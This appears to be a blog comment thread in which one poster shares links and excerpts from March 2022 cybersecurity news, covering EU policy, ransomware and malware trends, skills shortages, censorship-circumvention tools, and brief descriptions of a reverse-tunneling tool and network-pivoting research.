EU countries to call for the establishment of a cybersecurity emergency fund https://www.euractiv.com/section/cybersecurity/news/eu-countries-to-call-for-the-establishment-of-a-cybersecurity-emergency-fund/
European governments have drafted a declaration to reinforce the EU’s cybersecurity capacities, including establishing a new fund and increasing EU funding to support national efforts. The joint call will be adopted on Wednesday (9 March) in an informal meeting of telecommunications ministers organised by the French Presidency in Nevers. The schedule of the summit was reshuffled entirely to address the Ukrainian conflict.
Tomi Engdahl says:
Kyberturvallisuus on myös naisten asia
https://impulssilvm.fi/2022/03/08/kyberturvallisuus-on-myos-naisten-asia/
Tänä naistenpäivänä turvallisuus on teemana vielä aiempaakin merkityksellisempi. Omat ajatukseni ovat erityisesti Ukrainan naisissa ja tytöissä, heissä, jotka ovat joutuneet keskelle järkyttävää sotaa.
Valtava pelko, suru ja huoli rakkaiden sekä oman kodin puolesta horjuttavat elämää. Turvallisuuden tunne on heille asiana kaukainen.
Ajatellen turvallisuuden tunnetta lähemmin, on se itse asiassa tunteena etuoikeus, joka koostuu monesta eri osa-alueesta.
Turvallisuus on teema, joka on itselläni kulkenut punaisena lankana läpi urani. Teema on minulle merkityksellinen paitsi turvallisuuspolitiikan, myös yksilöitä ja yhteisöjä koskettavan psykologisen turvallisuuden näkökulmasta. Kyberturvallisuudessa on kyse molemmista.
Tomi Engdahl says:
Joseph Cox / VICE:
Twitter launches a Tor onion service using a modified version of the Enterprise Onion Toolkit, letting users access Twitter via any Tor-compatible browser — The site may become the most significant onion service created if it allows people to access Twitter from censored countries. — Joseph Cox
Twitter Launches Tor Onion Service Making Site Easier to Access in Russia
https://www.vice.com/en/article/v7dqxd/twitter-tor-onion-service-dark-web-version
The site may become the most significant onion service created if it allows people to access Twitter from censored countries.
Tomi Engdahl says:
The Psychology of Ransomware Response
https://www.securityweek.com/psychology-ransomware-response
The human response to cyber crises is not something that can be bought off a shelf and installed over the weekend. On average, it takes 96 days for a human to develop the knowledge, skills and judgment to defend against breaking threats – and that is too long during times of heightened threat.
Immersive Labs provides a platform designed to raise the cyber capabilities of a company’s entire workforce. “We’ve been operational since 2017,” the company told SecurityWeek, “and have collected a weighty amount of data – 2,100 organizations, 500,000 cybersecurity exercises at either our labs or via a crisis simulator looking at 1,500 separate threats or incidents, which could be anything from ransomware to SOC teams looking at specific malware.”
A Cyber Workforce Benchmark 2022 report (PDF) has analyzed the exercises and simulations. The results show that the technology and financial services sectors spend the most time on preparing the workforce for cyber incidents – with other critical infrastructure companies preparing the least.
https://cms.immersivelabs.com/content/uploads/2022/03/cyber-workforce-benchmark-2022–immersive-labsfinal.pdf
Tomi Engdahl says:
Talking About Cybersecurity and Cell Phones
Feb. 28, 2022
Alex Leadbeater, ETSI TC CYBER Chair, discusses the organization’s new standard focusing on cybersecurity and cell phones.
https://www.electronicdesign.com/technologies/iot/video/21215825/electronic-design-talking-about-cybersecurity-and-cell-phones?utm_source=EG%20ED%20Connected%20Solutions&utm_medium=email&utm_campaign=CPS220225025&o_eid=7211D2691390C9R&rdx.ident%5Bpull%5D=omeda%7C7211D2691390C9R&oly_enc_id=7211D2691390C9R
Defining security and assurance requirements for smart phones and tablets, ETSI recently released the “Consumer Mobile Device Protection Profile, ETSI TS 103 732″ specification, which identifies key security and privacy risks for user data and appropriate protection. The ETSI standard specifies security requirements for consumer mobile devices, ensuring protection of key user data. We speak to Alex Leadbeater, ETSI TC CYBER Chair, about this initiative.
The ETSI specification covers security features such as cryptographic support, user data protection, identification and authentication, security management, privacy protection, resistance to physical attack, secure boot, and trusted communication channels. ETSI TS 103 732 defines security assurance requirements and is suitable for certification initiatives such as the European Cybersecurity Act, offering a common methodology for evaluators to assess the security of consumer mobile devices.
Tomi Engdahl says:
Security Leaders Find Value in Veterans to Solve Cyber Skills Shortage
https://www.securityweek.com/veterans-cyberspace-underused-resource
CISOs struggling to fill their vacancies should take a closer look at the opportunities afforded by military veterans
While the cyber skills gap is not a new problem, it is persistent. CISOs are forced to be determined and imaginative in their approach to finding and recruiting new cybersecurity talent, and it is very hard. But there is a skills resource that remains largely underutilized: the military veteran.
This is the view of Jordan Mauriello, CSO at MDR firm Critical Start, and his CEO Rob Davis. Both are vets – and around 30% of the staff at Critical Start are also vets. “Being vets ourselves,” Mauriello told SecurityWeek, “doesn’t simply give us a greater proclivity to employ vets, it gives us an understanding of the value that a lot of vets can bring to cyber.”
He is critical of much of the current system of cyber training. “A lot of the universities and training organizations are deficient in providing the skills, and especially the real-world experience, that makes the difference between a security technician and a security theorist.” He believes both skills and experience can be found among the ranks of vets.
The parallels between military and cyber
Vets are immediately at home in cyberspace. “Insurgency is asymmetric warfare,” said Mauriello, “and cyber is often described as an asymmetric battleground.”
Cyber defenders have defense in depth against thousands of potential attackers, but it takes just one attacker to breach them just once. Just like the military must be on guard and effective without knowing where or how an insurgent might strike, so must a cyber defender do the same. In fact, it’s worse in cyber. If an insurgent fails against the military, there is usually a cost. In cyber, the attacker can continually try and fail until he succeeds with effectively no cost.
The ability and willingness to learn new skills is also common to both spheres. “A fundamental part of military life is continuous training,” said Mauriello. “You are always training, and it never stops. You train, you deploy, and then you come back and start training for the next deployment. That’s the military lifecycle. In security where it is constantly changing and the attackers are always doing something new, you must always be learning those new things. That’s just normal life for the military, which vets have been doing for years. Already, they’re jumping into a lifestyle and work ethic they understand. It’s just new knowledge and new skills they must learn.”
There are other advantages to employing vets, such as the military’s rules of engagement. Vets understand exactly what they can and cannot do. In an age of continuous hack back debate, this is a valuable check. And they also know and understand that attackers don’t constrain themselves to a 9-till-5 operational period. Vets are likely to be more ready to respond to an incident at any time than the newly graduated university student.
Tomi Engdahl says:
https://www.facebook.com/100068963182988/posts/274367674872003/
Ways to connect when authorities block services:
* Unblock YouTube grants you access to any blocked web page – https://m.proxfree.com
* Web Proxy — is an intermediate point between your computer and the needed website. – https://hidemy.name/en/
* Use ProxMate . This is a addons for webbrowser Mozilla Firefox or Chrome. – https://proxmate.me
* DNS provider that is open and democratic – https://www.opennic.org
* Android: Circumvent Internet restrictions with Tor -https://cyberguerrilla.org/android-circumvent-net-blocking-with-tor.htm
* Android users-
* https://play.google.com/store/apps/details?id=com.psiphon3
* Apple users – http://download.cnet.com/Free-VPN-Onavo-Protect/3000-2064_4-75893697.html
* Google browser – https://chrome.google.com/webstore/detail/zenmate-vpn-best-cyber-se/fdcgdnkidjaadafnichfpabhfomcebme
* Firefox users – https://addons.mozilla.org/en-US/firefox/addon/anonymox/
* List of DNS servers that can be used to avoid censorship – https://www.lifewire.com/free-and-public-dns-servers-2626062
* How Do I Change DNS Servers? – https://www.lifewire.com/how-to-change-dns-server-settings-2617979
* Tor Browser – https://www.torproject.org/download/download-easy.html.en
* What is the Tor Browser? – https://www.torproject.org/projects/torbrowser.html.en
InviZible Pro includes well-known modules such as DNSCrypt, Tor and Purple I2P https://invizible.net/en/
In case it is needed: Dial up internet access VPN Jabber … http://www.cisco.com/c/dam/en/us/products/collateral/security/asa-5500-series-next-generation-firewalls/guide_c07-717020.pdf
Alternate DNS – https://wikileaks.org/wiki/Alternative_DNS/de
Stay Anonymous- https://www.whonix.org
General router DNS setup(recommended) – http://support.smartdnsproxy.com/customer/portal/articles/1558303-general-router-dns-setup-smart-dns-proxy
Express VPN https://www.expressvpn.com/support/vpn-setup/manual-config-for-dd-wrt-router-with-openvpn/
Anonymity Script- https://github.com/HiroshiManRise/anonym8
Secure your wifi- https://www.pcmag.com/article2/0,2817,2409751,00.asp
Stop your internet provider from tracking you – http://www.pcworld.com/article/3184767/security/three-privacy-tools-that-block-your-internet-provider-from-tracking-you.html
VPN GATE client for linux – https://github.com/Dragon2fly/vpngate-with-proxy
HIDING TOR FROM YOUR ISP – PART 1 – BRIDGES AND PLUGGABLE TRANSPORTS- https://www.deepdotweb.com/jolly-rogers-security-guide-for-beginners/hiding-tor-from-your-isp-part-1-bridges-and-pluggable-transports/
TOR Bridges- https://www.torproject.org/docs/bridges
Tomi Engdahl says:
Security and the Peter Principle – Seven Signs That You Are Working for a “Peter”
https://www.securityweek.com/security-and-peter-principle-seven-signs-you-are-working-peter
Seven signs that you are working for a “Peter” and how you can adjust how you work to compensate
Laurence J. Peter was a Canadian educator and author who was perhaps most well known for his famous book “The Peter Principle”. In his book, Peter and co-author Raymond Hull explain the Peter principle, which “observes that people in a hierarchy tend to rise to ‘a level of respective incompetence’: employees are promoted based on their success in previous jobs until they reach a level at which they are no longer competent, as skills in one job do not necessarily translate to another.” (source). Since then, the Peter principle has become widely known and has been a favorite topic of discussion.
As a professional discipline, security is not immune to the Peter principle. I’m sure you’ve experienced it over the course of your career just as much as I have over the course of mine. While we may not be able to fix the organizational issues created by a “Peter”, by identifying the signs that we are working for one, we can often adjust how we work to compensate.
In this spirit, I offer seven signs that you are working for a “Peter” and how you can adjust how you work to compensate:
1. Inability to think and plan strategically: When a strong security leader has a handle on their work responsibilities and understands the business, domain, and organization in which they work, that leader will be able to think and plan strategically. They will be able to set goals and priorities to ensure that strategic initiatives go from conception to implementation. They will also be able to delegate appropriately, with the ability to monitor and track progress without the need to micromanage.
2. Running from crisis to crisis: Perhaps one of the most widely seen symptoms of not being methodical and strategic is the tendency to run from crisis to crisis. Some of the best managers I’ve had over the course of my career have been able to see an issue before anyone else and navigate the team towards pre-empting it.
3. Hesitance to put anything in writing: A common defense mechanism of a “Peter” is to avoid putting anything in writing. After all, when something goes wrong and it is time for a person or a team to take responsibility, written accounts are important. If there is nothing in writing, the situation quickly becomes a game of “he said, she said”.
4. Does not make tough decisions: Decision making, or at least timely and responsible decision making, is not easy at all. The “Peter”, realizing that they are in over their head, will not be able to make decisions, and in particular, tough decisions. The reason for this is simple: there exists the possibility of making the wrong decision and thus being held accountable for that wrong decision.
5. Does not answer tough questions: Answering tough questions is almost as difficult as making tough decisions. I have found over the course of my career that colleagues overwhelmingly prefer direct, open, and transparent answers, even if they are not the answers they were hoping to hear. A “Peter” won’t give a straight answer.
6. Words and actions don’t align: We have all worked with people who say one thing and do another. This is especially the case with a “Peter”. When tough decisions are hard to make and tough answers are hard to communicate, the “Peter” may resort to pleasing the crowd, almost in a populist fashion. While it may tame the crowd in the near-term, in the long-term, it always catches up with the “Peter” and their team.
7. Poor communication skills: If you can’t fully understand something, don’t have a plan, and don’t have any answers, that renders effective communication nearly impossible. This is something routinely encountered by customers, executives, team members, and other stakeholders when a “Peter” is involved. Unfortunately, this causes a loss of confidence and trust in both the “Peter” and the team.
Tomi Engdahl says:
Security Guidance 2022-01 – Cybersecurity mitigation measures against critical threats https://media.cert.europa.eu/static/WhitePapers/TLP-WHITE-CERT-EU_Security_Guidance-22-001_v1_0.pdf
[...] this surge of US personnel in October and November was
different: it was in preparation of impending war. People familiar with the operation described an urgency in the hunt for hidden malware, the kind which Russia could have planted, then left dormant in preparation to launch a devastating cyber attack alongside a more conventional ground invasion.. On February 14, ENISA and CERT-EU made a joint publication strongly encouraging all EU- based organisations to implement a set of cybersecurity best practices. Building on this joint publication, CERT-EU is making available the following specific
imple- mentation recommendations. By applying these systematically, organisations can boost their cybersecurity defence and resilience.
This would allow them to: Improve their cybersecurity posture to fend off a wide range of attacks and limit the number of cybersecurity incidents. Detect and react to cyber operations that may be carried off by sophisticated threat actors.
Tomi Engdahl says:
Securing healthcare: An IT health check on the state of the sector https://www.welivesecurity.com/2022/03/09/securing-healthcare-it-health-check-state-sector/
There’s far more than just money at stake: a 2019 study claimed that even data breaches can increase the 30-day mortality rate for heart attack victims. Indeed, while a now-infamous ransomware incident in Germany is not thought to have directly caused the death of a patient, it was one of the potent harbingers of the potential real-world impact of virtual attacks, when life-saving systems are taken offline. As European healthcare organizations (HCOs) continue to digitalize in response to the pressures of COVID-19, an increasingly remote workforce and an ageing population, these risks will only grow. But by building cyber-resilience through improved IT hygiene and other best practices, and enhancing incident detection and response, there is a way forward for the sector.
Tomi Engdahl says:
EU governments call on online platform to scale up fact-checking efforts https://www.euractiv.com/section/digital/news/ukraine-les-27-exhortent-google-meta-et-twitter-de-passer-a-la-vitesse-superieure/
EU telecoms ministers have urged digital companies to ensure their anti-disinformation capacity is adequate in Central Eastern Europe, a primary target of Russian hybrid warfare. EU governments gathered in France for an informal meeting on Tuesday (8 March) to discuss how to counter online disinformation from the Kremlin, following the Russian aggression of Ukraine almost two weeks ago. Representatives from Google, YouTube, Meta and Twitter were invited to the discussion.
Tomi Engdahl says:
Mobile Malware is Surging in Europe: A Look at the Biggest Threats https://www.proofpoint.com/us/blog/email-and-cloud-threats/mobile-malware-surging-europe-look-biggest-threats
Starting in early February, our researchers detected a 500% jump in mobile malware delivery attempts in Europe. This is in keeping with a trend we’ve observed over the past few years where mobile messaging abuse has steadily increased as attackers ramp up attempts at smishing (SMS/text-based phishing) and sending malware to mobile devices. In
2021 alone, we detected several different malware packages across the globe. Although volume fell sharply toward the end of 2021, we’re seeing a 2022 resurgence.
Tomi Engdahl says:
February 2022′s Most Wanted Malware: Emotet Remains Number One While Trickbot Slips Even Further Down the Index https://blog.checkpoint.com/2022/03/09/february-2022s-most-wanted-malware-emotet-remains-number-one-while-trickbot-slips-even-further-down-the-index/
Check Point Research (CPR) reveals that Emotet is again the most prevalent malware, while Trickbot falls from second place into sixth.
Apache Log4j is no longer the most exploited vulnerability but Education/Research is still the most attacked industry. This month Education/Research continues to be the most attacked industry globally followed by Government/Military and Internet service provider (ISP) / managed service provider (MSP). “Web Server Exposed Git Repository Information Disclosure” is the most commonly exploited vulnerability, impacting 46% of organizations globally, followed by “Apache Log4j Remote Code Execution” which dropped from first to second place and impacts 44% of organizations worldwide. “HTTP Headers Remote Code Execution” is the third most exploited vulnerability, with a global impact of 41%.
Emotet Redux
https://blog.lumen.com/emotet-redux/
Since its reemergence on Nov. 14, 2021, Black Lotus Labs has once again been tracking Emotet, one of the world’s most prolific malware distribution families which previously infected more than 1.6M devices and caused hundreds of millions of dollars in damage across critical infrastructure, healthcare, government organizations and enterprises around the world. Using our global visibility, we have determined that while Emotet has not yet attained the same scale it once had, the botnet is showing a strong resurgence with a total of approximately 130, 000 unique bots spread across 179 countries since November 2021.
This growing pool of bots presents a looming threat to organizations around the world; Emotet bots serve to not only propagate the malware by spamming targets through legitimate mail servers using stolen credentials, but they also serve as footholds for lateral movement in coveted networks and could be promoted to act as proxy C2s.
Tomi Engdahl says:
8 Top Git Security Issues & What To Do About Them https://blog.checkpoint.com/2022/03/08/8-top-git-security-issues-what-to-do-about-them/
Git is the most popular software version control (SVC) standard used by developers today. That doesn’t make it the most secure. Whether you’re using GitLab, GitHub, or a locally hosted Git server; there are many security issues that can sneak up on you and start a snowball effect of unpleasant repercussions. At its core, Git is not built for security but for collaboration. As such, it is not secure but can be made secure through the use of tools and best practices. In this post, we’ll review just how secure Git is (or rather isn’t). We will demonstrate why and how serious Git security issues can be. Then, we’ll list the eight most common Git security issues, and what you can do about them.
Tomi Engdahl says:
Hackers fork open-source reverse tunneling tool for persistence https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/
Security experts have spotted an interesting case of a suspected ransomware attack that employed custom-made tools typically used by APT (advanced persistent threat) groups. Although no concrete connection between groups has been uncovered, the operational tactics, targeting scope, and malware customization capabilities signify a potential connection. See also:
https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf
https://github.com/sysdream/ligolo
Ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve).
It is comparable to Meterpreter with Autoroute + Socks4a, but more stable and faster.
You compromised a Windows / Linux / Mac server during your external audit. This server is located inside a LAN network and you want to establish connections to other machines on this network.
Ligolo can setup a tunnel to access internal server’s resources.
Tomi Engdahl says:
Pivoting Between Corporate IT and OT Networks with Network Shell https://www.dragos.com/blog/pivoting-between-corporate-it-and-ot-networks-with-network-shell/
Often during a penetration test, one of the primary objectives is to find a way to pivot from the corporate network to the operational technology (OT)/SCADA networks. The reason for this objective is that it is unlikely that an adversary can cause an operational impact with access limited to the corporate IT networks. While pivoting to OT networks is not a trivial task, it is often aided by poor security hygiene like weak network perimeters and shared credentials. This blog explores one way an adversary may leverage the Network Shell (Netsh) utility to exploit weak network segmentation and gain access to OT networks.
Tomi Engdahl says:
Incidents Handling and Cybercrime Investigations https://www.enisa.europa.eu/news/enisa-news/incidents-handling-and-cybercrime-investigations
The European Union Agency for Cybersecurity (ENISA) explores how CSIRTs, law enforcement agencies and the judiciary cooperate and how they can train together to better tackle cyber incidents and respond to cybercrime. The report facilitates the cooperation between CSIRTs and law enforcement agencies (LEAs) and looks into their interaction with the judiciary (judges and prosecutors). This updated and extended version of the report comes along with an updated version of the training material delivered by ENISA in 2020 in the form of a handbook and a toolset.
Tomi Engdahl says:
Why You Need a Diversity and Inclusion Program in Cybersecurity https://securityintelligence.com/articles/why-you-need-diversity-inclusion-program-cybersecurity/
When talking about security, it’s easy to focus on the tools and technologies. After all, they’re what we use to keep apps, data and infrastructure secure. And when we do talk about people, it’s often about the skills. Once in a while, we focus on how employees often contribute to cyberattacks with poor cyber habits and need ongoing cybersecurity training. But at the core of all cybersecurity programs and efforts is a team of people. They work together to design the processes and strategy. In short, people are at the heart of the larger digital transformation and the related digital safety efforts.
And many cybersecurity discussions overlook the importance of creating a diverse and inclusive team.
Tomi Engdahl says:
Näin Venäjä voisi iskeä tällaisia ovat Suomeen kohdistuvat verkkouhat https://www.is.fi/digitoday/tietoturva/art-2000008670405.html
Asiantuntijoiden mukaan Suomen kyky puolustautua kyberhyökkäyksiä vastaan on hyvä, mutta puolustettavaa on paljon. Suomessa harjoitellaan uhkia varten koko ajan.
Huoltovarmuuskeskus: “Kyberasiantuntijoista, lannotteista ja maakaasusta voi tulla pulaa”
https://yle.fi/uutiset/3-12350826
Venäjän hyökkäys Ukrainaan on siis heijastunut myös kyberturvallisuustilanteeseen. Onko valmiutta myös siellä puolella nostettu?. – Ukrainan kriisistä huolimatta kansallinen kyberturvallisuustilanne on normaali. Verkoissa tapahtuu jatkuvasti erilaisia palvelunestohyökkäyksiä ja koko ajan on erilaisia haittaohjelmia liikkeellä. Käyttäjille ne eivät juurikaan näy, koska viranomaiset ja elinkeinoelämän toimijat hoitavat ne omin toimenpitein. Tämä kuvaa sitä Suomen varautumista, Paananen sanoo. – Kyberturvallisuuden osaajista on merkittävä pula. Osaajia on se, mitä tarvitaan, Paananen sanoo.
Tomi Engdahl says:
Russia May Use Ransomware Payouts to Avoid Sanctions https://threatpost.com/russia-ransomware-payouts-avoid-sanctions/178854/
FinCEN warns financial institutions to beware of unusual cryptocurrency payments or illegal transactions Russia may use to evade restrictions imposed due to its invasion of Ukraine. FinCEN
Alert:
https://www.fincen.gov/sites/default/files/2022-03/FinCEN%20Alert%20Russian%20Sanctions%20Evasion%20FINAL%20508.pdf
Tomi Engdahl says:
Cyberattacks highlight risks to physical and digital supply chains https://therecord.media/kojima-nvidia-samsung-cybersecurity-supply-chain/
A string of recent cyberattacks and data leaks, including those targeting a supplier for Toyota Motors, major chipmaker NVIDIA, and international electronics giant Samsung, are putting renewed focus on cybersecurity vulnerabilities in the physical and digital supply chains relied on around the world. These are forms of supply chain cyberattacks – attacks that target weak links in software systems and use them to access bigger, more secure, and more established companies or targets.
Tomi Engdahl says:
Russia creates its own TLS certificate authority to bypass sanctions https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/
Russia has created its own trusted TLS certificate authority (CA) to solve website access problems that have been piling up after sanctions prevent certificate renewals. However, for new Certificate Authorities
(CA) to be trusted by web browsers, they first needed to be vetted by various companies, which can take a long time. Currently, the only web browsers that recognize Russia’s new CA as trustworthy are the Russia-based Yandex browser and Atom products, so Russian users are told to use these instead of Chrome, Firefox, Edge, etc.
Tomi Engdahl says:
Yleisimmät haittaohjelmat Suomessa ja maailmalla, syöttinä Ukrainan sota Nämä alat ovat nyt useimmin kyberhyökkäysten kohteena https://www.epressi.com/tiedotteet/tietotekniikka/yleisimmat-haittaohjelmat-suomessa-ja-maailmalla-syottina-ukrainan-sota-nama-alat-ovat-nyt-useimmin-kyberhyokkaysten-kohteena.html
Check Point Research kertoo helmikuun haittaohjelmakatsauksessaan, että maailman yleisin haitake oli Emotet, joka houkuttelee Ukrainan sotaan liittyvistä aiheista kiinnostuneita lataamaan haitallisia sähköpostiliitteitä. Suomen yleisin kyberkiusa helmikuussa oli kiristysohjelma Netwalker.
Tomi Engdahl says:
Introducing the new Defending Against Critical Threats’ report https://blogs.cisco.com/security/introducing-the-new-defending-against-critical-threats-report
Today, we’re pleased to launch our annual Defending Against Critical Threats report. Inside, we cover the most significant vulnerabilities and incidents of 2021, with expert analysis, insights and predictions from our security and threat intelligence teams across Cisco Talos, Duo Security, Kenna Security, and Cisco Umbrella.
Tomi Engdahl says:
From Cyber Threats to Cyber Talent, Insights From the Front Lines
https://www.securityweek.com/cyber-threats-cyber-talent-insights-front-lines
A conversation with Callie Guenther, cyber threat intelligence (CTI) manager at Critical Start
Closing the cybersecurity workforce gap has been a top concern for more than a decade. But it has become more urgent given the escalation in cyberattacks over the last two years, punctuated by recent geopolitical events. Diversity is key to both expanding the talent pool and providing different perspectives as the threat landscape evolves. As a woman of color with a strong political science and cyber threat intelligence (CTI) background, Callie Guenther is uniquely positioned to offer valuable insights on these topics. Callie, CTI Manager at Critical Start, leads a team responsible for intelligence operations across the Cyber Research Unit, managing the entire intelligence lifecycle to provide relevant CTI to internal and external stakeholders.
Tomi Engdahl says:
All About the Bots: What Botnet Trends Portend for Security Pros
https://www.securityweek.com/all-about-bots-what-botnet-trends-portend-security-pros
Protecting your organization against botnet threats requires a holistic, integrated approach to security
Botnets have become a fixture in the threat landscape, but they aren’t primarily focused on DDoS attacks anymore. Nowadays, they’re in a state of evolution as they learn and use newer, more evolved cybercriminal attack techniques. They have become multi-purpose attack vehicles using an assortment of more sophisticated attack techniques, including ransomware.
For example, threat actors – including operators of botnets like Mirai – integrated exploits for the Log4j vulnerability into their attack kits. Let’s take a look at what we’re seeing and what these trends mean for security professionals and their respective organizations.
Tomi Engdahl says:
Why You Should Be Using CISA’s Catalog of Exploited Vulns
It’s a great starting point for organizations that want to ride the wave of risk-based vulnerability management rather than drowning beneath it.
https://www.darkreading.com/vulnerabilities-threats/why-you-should-be-using-cisa-s-catalog-of-exploited-vulns
Tomi Engdahl says:
How an OSPO Can Help Secure Your Software Supply Chain
https://thenewstack.io/how-an-ospo-can-help-secure-your-software-supply-chain/
It’s nearly impossible these days to build software without using open source code. But all that free software carries additional security risks.
Organizations grapple with how best to secure their open source software supply chain. But there’s another problem: Many companies don’t even know how many open source applications they have — or what’s in them.
The worst-case scenarios include debacles like 2021’s Log4j security vulnerability, or what happened with SolarWinds’ proprietary Orion network monitoring product, which was infected with malware in 2020.
For companies that build and ship software, the best practice is to “ship what you know and know what you ship,”
Tomi Engdahl says:
SEC proposes four-day rule for public companies to report cyberattacks
And it’ll be in an 8-K for all to see
https://www.theregister.com/2022/03/09/sec_cyberattack_disclosure/
Tomi Engdahl says:
How to finally secure the software supply chain
By Dr Simon Wiseman published 10 days ago
Keeping things secure with third-party code
https://www.techradar.com/features/how-to-finally-secure-the-software-supply-chain
Tomi Engdahl says:
Encryption meant to protect against quantum hackers is easily cracked
https://www.scientiststudy.com/2022/03/encryption-meant-to-protect-against.html
Tomi Engdahl says:
How artificial intelligence is influencing the arms race in cybersecurity
Everything in excess is dangerous, so is A.I.
https://interestingengineering.com/artificial-intelligence-cybersecurity
Tomi Engdahl says:
https://www.analyticsinsight.net/10-must-watch-cybersecurity-movies-and-series-in-2022/
Tomi Engdahl says:
Understanding How Hackers Recon
https://thehackernews.com/2022/03/understanding-how-hackers-recon.html
Cyber-attacks keep increasing and evolving but, regardless of the degree of complexity used by hackers to gain access, get a foothold, cloak their malware, execute their payload or exfiltrate data, their attack will begin with reconnaissance. They will do their utmost to uncover exposed assets and probe their target’s attack surface for gaps that can be used as entry points.
So, the first line of defense is to limit the potentially useful information available to a potential attacker as much as possible. As always, the tug of war between operational necessity and security concerns needs to be taken into account, which requires a better understanding of the type of information typically leveraged.
Tomi Engdahl says:
Researchers from JFrog’s Security Research team discovered five vulnerabilities in the PJSIP open-source multimedia communication library.
https://securityaffairs.co/wordpress/128603/hacking/pjsip-library-critical-flaws.html
Tomi Engdahl says:
Tuli uutisseurannassa tälläinen viritelmä vastaan:
“… In September 2019, Chinese delegates from telecom giant Huawei pitched [a new internet protocol](https://www.huawei.com/en/technology-insights/industry-insights/innovation/new-ip#:~:text=What%20is%20New%20IP%3F,future%20digital%20industry%20and%20society.)(IP) at the ITU. Western countries voted down the resolution, an unusual case in the standard-setting sector, where decisions are typically taken via consensus … Beijing is pushing for a system of loosely interconnected networks, each with specific rules enforced via a massive VPN. That would create control points able to decrypt communications, enforce or shut down traffic. … ”
https://www.euractiv.com/section/digital/news/china-russia-prepare-new-push-for-state-controlled-internet/
Tomi Engdahl says:
Senate approves historic cyber incident reporting bill, sends to Biden’s desk https://therecord.media/senate-approves-historic-cyber-incident-reporting-bill-sends-to-bidens-desk/
The Senate on Thursday passed landmark legislation that will mandate critical infrastructure operators alert the federal government when they are hacked or make a ransomware payment.